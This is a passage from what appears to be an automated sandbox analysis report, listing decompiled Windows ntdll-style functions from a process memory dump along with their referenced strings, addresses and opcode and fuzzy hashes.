								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E018AF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E018A95D0();
										L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0189f0d3
0x0189f0d9
0x0189f0e0
0x0189f0e7
0x0189f0f2
0x0189f0f4
0x0189f0f8
0x0189f100
0x0189f108
0x0189f10d
0x0189f115
0x0189f116
0x0189f11f
0x0189f123
0x0189f124
0x0189f12c
0x0189f130
0x0189f134
0x0189f13d
0x0189f144
0x0189f14b
0x0189f152
0x018dbab0
0x018dbab0
0x0189f158
0x0189f158
0x0189f15a
0x0189f160
0x0189f165
0x0189f166
0x0189f16f
0x0189f173
0x018dbaa7
0x018dbaa7
0x018dbaab
0x00000000
0x0189f179
0x0189f18d
0x0189f191
0x018dbaa2
0x00000000
0x0189f197
0x0189f19b
0x0189f1a2
0x0189f1a9
0x0189f1af
0x0189f1b2
0x0189f1b6
0x0189f1b9
0x0189f1c4
0x0189f1d8
0x0189f1df
0x0189f1e3
0x0189f1eb
0x0189f1ee
0x0189f1f4
0x0189f20f
0x018dbab7
0x018dbabb
0x018dbacc
0x018dbad1
0x0189f215
0x0189f218
0x0189f226
0x0189f22b
0x00000000
0x0189f22b
0x0189f1f6
0x0189f1f6
0x0189f1f9
0x0189f1fb
0x0189f1fb
0x0189f1f4
0x0189f191
0x0189f173
0x0189f152
0x0189f203

Strings

@, xrefs: 0189F124

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 7ce6ac3c4ecc723818fff0d2185f27e6f1bffd028795d7eebb7978d501794b7c
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: CA516971504715ABD321DF29C840A6BBBF8FF48714F00892EFA95C7690E7B4EA04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 018E3540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E018E3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x195d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E018A0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E018E3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E018AFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E018E3540;
						E018AFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E018BDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E018F0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E018A97C0();
					}
					return E018AB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E018E3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E018E3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E018AFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E018A9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E018E3787(_a4,  &_v352, _t80);
						}
					}
					L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E018A95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x018e3552
0x018e355a
0x018e355d
0x018e3566
0x018e3567
0x018e357e
0x018e358f
0x018e35a1
0x018e35a5
0x018e366b
0x018e366b
0x018e366d
0x018e3672
0x018e3679
0x018e3685
0x018e368d
0x018e369d
0x018e36a7
0x018e36b8
0x018e36c6
0x018e36c7
0x018e36dc
0x018e36e1
0x018e36e7
0x018e36e9
0x018e36e9
0x018e3703
0x018e3703
0x018e35b5
0x018e35c0
0x018e35c4
0x00000000
0x00000000
0x018e35ca
0x018e35d7
0x018e35e2
0x018e35e6
0x018e35e8
0x018e35f5
0x018e35fa
0x018e3603
0x018e3604
0x018e3609
0x018e360a
0x018e3612
0x018e3613
0x018e361e
0x018e3622
0x018e3628
0x018e362f
0x018e362f
0x018e3636
0x018e3638
0x018e363b
0x018e3642
0x018e3642
0x018e3636
0x018e3657
0x018e3657
0x018e365c
0x018e3662
0x018e3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 018E358F

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 9f4361ce77d977832d771d858460353faf25c73ff9f7cb927edebc88b05982ff
Instruction ID: 8b2a0de304c2ac57470cd7420608316886abfc4eaf44f3b06b64c5fececa6abf
Opcode Fuzzy Hash: 9f4361ce77d977832d771d858460353faf25c73ff9f7cb927edebc88b05982ff
Instruction Fuzzy Hash: 5B4143B1D0052D9BDB219A64CC84FDEB77CAB45714F0045A5EB09EB251DB309F88CF95

Uniqueness

Uniqueness Score: -1.00%

Function 019305AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E019305AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E019307DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E018A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0192A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0192A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01931293(_t79, _v40, E019307DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01887D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0192138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x019305c5
0x019305ca
0x019305d3
0x019306db
0x019306db
0x019306dd
0x019306e3
0x019306e3
0x019305dd
0x019305e7
0x019305f6
0x01930600
0x01930607
0x01930610
0x01930615
0x0193061a
0x0193061c
0x0193061e
0x01930624
0x01930625
0x01930627
0x01930628
0x01930631
0x01930640
0x0193064d
0x01930654
0x01930654
0x01930631
0x0193066d
0x01930674
0x00000000
0x00000000
0x01930692
0x0193069e
0x019306b0
0x019306a0
0x019306a9
0x019306a9
0x019306b8
0x019306d6
0x019306d6
0x00000000

Strings

`, xrefs: 01930633

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 2820e240365edd2f2bda7a33108494e13ed96abb47dd8e225d8b1b516229a8fd
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: C4310432604746ABE710DE29CC44F977BD9FBC4758F184229FA58DB284D770E904C791

Uniqueness

Uniqueness Score: -1.00%

Function 018E3884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E018E3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E018A9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01884620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E018A9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x018e3893
0x018e3896
0x018e3899
0x018e389f
0x018e38a0
0x018e38a4
0x018e38a9
0x018e38ac
0x018e38ad
0x018e38ae
0x018e38af
0x018e38b1
0x018e38b4
0x018e38bb
0x018e38bc
0x018e38bd
0x018e38c4
0x018e38c8
0x018e38ca
0x018e38ca
0x018e38d5
0x018e393e
0x018e3940
0x018e3942
0x018e3952
0x018e3954
0x018e3961
0x018e3961
0x018e3967
0x018e396e
0x018e396e
0x018e3947
0x018e394c
0x00000000
0x018e394c
0x018e38ea
0x018e38ee
0x018e38f8
0x018e38f9
0x018e38ff
0x018e3900
0x018e3902
0x018e3903
0x018e390b
0x018e390f
0x018e3950
0x00000000
0x018e3950
0x018e3915
0x018e391d
0x018e391d
0x018e3922
0x018e3926
0x00000000
0x018e3928
0x018e392b
0x018e392b
0x018e3935
0x018e3937
0x018e3937
0x00000000
0x018e3935
0x018e3926
0x018e38f0
0x00000000

Strings

BinaryName, xrefs: 018E38B4

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 14daba865223185b90a73240c82b0850fea306ce761dc6eb2a91c741445baa97
Instruction ID: 7f4245656d1f0e0f182dbcfa9c2b15f14ef1844f787f2bde241ee44e9478a320
Opcode Fuzzy Hash: 14daba865223185b90a73240c82b0850fea306ce761dc6eb2a91c741445baa97
Instruction Fuzzy Hash: 7431BF7290151AABEB15EA58C949E6ABBB4FB82B20F024169AD14E7251D7309F00C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0189D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0189D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x195d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01884120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E018AB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E018A98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E018A95D0();
					L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0189d29c
0x0189d2a6
0x0189d2b1
0x0189d2b5
0x0189d2b6
0x0189d2bc
0x0189d2bd
0x0189d2be
0x0189d2bf
0x0189d2c2
0x0189d2c4
0x0189d2cc
0x0189d384
0x0189d34b
0x0189d34f
0x0189d350
0x0189d351
0x0189d35c
0x0189d35c
0x0189d2d6
0x0189d2da
0x0189d2e1
0x0189d361
0x0189d369
0x0189d36d
0x0189d2e3
0x0189d2e3
0x0189d2e3
0x0189d2e5
0x0189d2ed
0x0189d2f5
0x0189d2fa
0x0189d302
0x0189d303
0x0189d30b
0x0189d30f
0x0189d313
0x0189d318
0x0189d31c
0x0189d320
0x0189d379
0x0189d37d
0x00000000
0x00000000
0x018daffe
0x018db001
0x018db011
0x00000000
0x0189d322
0x0189d322
0x0189d330
0x0189d337
0x0189d35d
0x0189d339
0x0189d33f
0x0189d38c
0x0189d38c
0x0189d33f
0x0189d349
0x00000000
0x0189d349

Strings

@, xrefs: 0189D303

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: d96566d169c6af375d0367e17de046fe1d0016fd708cad6c27f6b60c6ab23332
Instruction ID: fbcb802ea5e43a862c6a8d798125657677f924642947d770f76c0ffbb5b6b838
Opcode Fuzzy Hash: d96566d169c6af375d0367e17de046fe1d0016fd708cad6c27f6b60c6ab23332
Instruction Fuzzy Hash: 3231B1B15083059FDB11DF6CC98096BBBE8EB95758F440A2EF994C3211E634DE04DB97

Uniqueness

Uniqueness Score: -1.00%

Function 01871B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01871B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E018ABB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E018AA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E018AA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01884620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x01871b8f
0x01871b9a
0x01871b9c
0x01871b9e
0x01871ba3
0x018c7010
0x018c7010
0x00000000
0x01871ba9
0x01871ba9
0x01871bae
0x00000000
0x01871bc5
0x01871bca
0x01871bcf
0x01871bd0
0x01871bd1
0x01871bd2
0x01871bd6
0x01871bdc
0x01871be0
0x018c6ffc
0x018c7000
0x00000000
0x018c7006
0x018c7009
0x018c7009
0x01871be6
0x01871bec
0x01871c0b
0x01871c0b
0x01871c0c
0x01871c11
0x01871c12
0x01871c15
0x01871c1b
0x01871c1f
0x01871c31
0x01871c33
0x018c7026
0x018c7026
0x01871c21
0x01871c24
0x01871c24
0x01871bee
0x01871bee
0x01871bf2
0x01871c3a
0x01871bf4
0x01871bf4
0x01871c05
0x01871c05
0x01871c09
0x01871c3e
0x00000000
0x00000000
0x00000000
0x01871c09
0x01871bec
0x01871be0
0x01871bae
0x01871c2e

Strings

WindowsExcludedProcs, xrefs: 01871BC5

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 523765eb94f2a35d49295ed393463802c563891a9abfd20dbb77ac8554fa7c5f
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 3721F97B501229EBEB229A9DC844F6BBBADEF81B54F154425FE14DB600D630DF00DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0188F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0188F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0188f71d
0x0188f722
0x0188f726
0x018d4770
0x0188f765
0x0188f769
0x0188f769
0x0188f732
0x018d477a
0x00000000
0x018d477a
0x0188f738
0x0188f73a
0x0188f73c
0x0188f73f
0x0188f746
0x0188f778
0x0188f7a9
0x0188f7a9
0x0188f754
0x0188f75a
0x0188f75d
0x0188f75f
0x0188f761
0x0188f76f
0x0188f771
0x0188f771
0x0188f76f
0x0188f763
0x00000000
0x0188f763
0x0188f77d
0x0188f7a3
0x0188f7a5
0x00000000
0x0188f7a5
0x0188f77f
0x0188f782
0x0188f784
0x0188f786
0x00000000
0x00000000
0x00000000
0x0188f788
0x0188f748
0x0188f74d
0x0188f78d
0x0188f793
0x0188f7b7
0x0188f7bc
0x00000000
0x0188f7bc
0x0188f798
0x00000000
0x00000000
0x0188f79d
0x0188f7b0
0x00000000
0x0188f7b0
0x0188f79f
0x00000000
0x0188f74f
0x0188f74f
0x00000000
0x0188f74f

Strings

Actx , xrefs: 0188F73F

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 60da99dc48480c758e1245c367a8007555ba691d7db1656c6359b3872668ce64
Instruction ID: 486c98e06cc600678ea156ebbc753bab1b1377e2ee99e4edfa5185e83b6c58c4
Opcode Fuzzy Hash: 60da99dc48480c758e1245c367a8007555ba691d7db1656c6359b3872668ce64
Instruction Fuzzy Hash: B71104343047C68BFB347E1CC9907367695EB86328F25463AE761CB391DB74DA008340

Uniqueness

Uniqueness Score: -1.00%

Function 01918DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01918DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1940d50);
				E018BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E018F5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L018BDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L018BDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E018BD130(_t34, _t39, _t40);
			}

0x01918df1
0x01918df1
0x01918df1
0x01918df1
0x01918df1
0x01918df1
0x01918df3
0x01918df8
0x01918dfd
0x01918e00
0x01918e0e
0x01918e2a
0x01918e36
0x01918e38
0x01918e3c
0x01918e46
0x01918e46
0x01918e36
0x01918e50
0x01918e56
0x01918e59
0x01918e5c
0x01918e60
0x01918e67
0x01918e6d
0x01918e73
0x01918e74
0x01918eb1
0x01918ebd

Strings

Critical error detected %lx, xrefs: 01918E21

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 18f40b8de0ae5a55417435b2bcf2a7a42e62a26005fe7112c922fca8838361a4
Instruction ID: 972f47ffbc428337e8d0da8b50de5b920b150edd603f3e9c4ce2a00224ce8359
Opcode Fuzzy Hash: 18f40b8de0ae5a55417435b2bcf2a7a42e62a26005fe7112c922fca8838361a4
Instruction Fuzzy Hash: C7117571D04348EBEB29DFA88545BDCBBB4AB04315F20422EE528AB382C3346602DF15

Uniqueness

Uniqueness Score: -1.00%

Function 018FFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 018FFF60

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 32e3a33cf7561be3eeafe7ec68ecbe979caa505610c8a5c5c32afe5f16aa1f6c
Instruction ID: 831e3012100a1e73cf99a71c8eeae4381927b7c92045c0a9b28a1fa14fcfc00a
Opcode Fuzzy Hash: 32e3a33cf7561be3eeafe7ec68ecbe979caa505610c8a5c5c32afe5f16aa1f6c
Instruction Fuzzy Hash: 2C11A172950644EFEB26DB58C988F98BBB1FB04718F148058E708E7261CB399B50CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01935BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bb993b904a4583aa946c6464ad7a192330b3f9b68cdb268367885c9087e8d65
Instruction ID: 5636c68a202f7ab55abd508d8383ee049443314f82662f143c20135ac7f4c8d5
Opcode Fuzzy Hash: 6bb993b904a4583aa946c6464ad7a192330b3f9b68cdb268367885c9087e8d65
Instruction Fuzzy Hash: 81426E75D00219DFEB24CF68C880BA9BBB5FF89305F1581AAD94DEB242D7349A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01884120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6a38f03256de191da650e45475da6d47c8a65af94471e270a064df4d56572c1
Instruction ID: 999f7aa046c065aa0572544b58cdd6cad2b1ca5f183c213184bc630a552356eb
Opcode Fuzzy Hash: f6a38f03256de191da650e45475da6d47c8a65af94471e270a064df4d56572c1
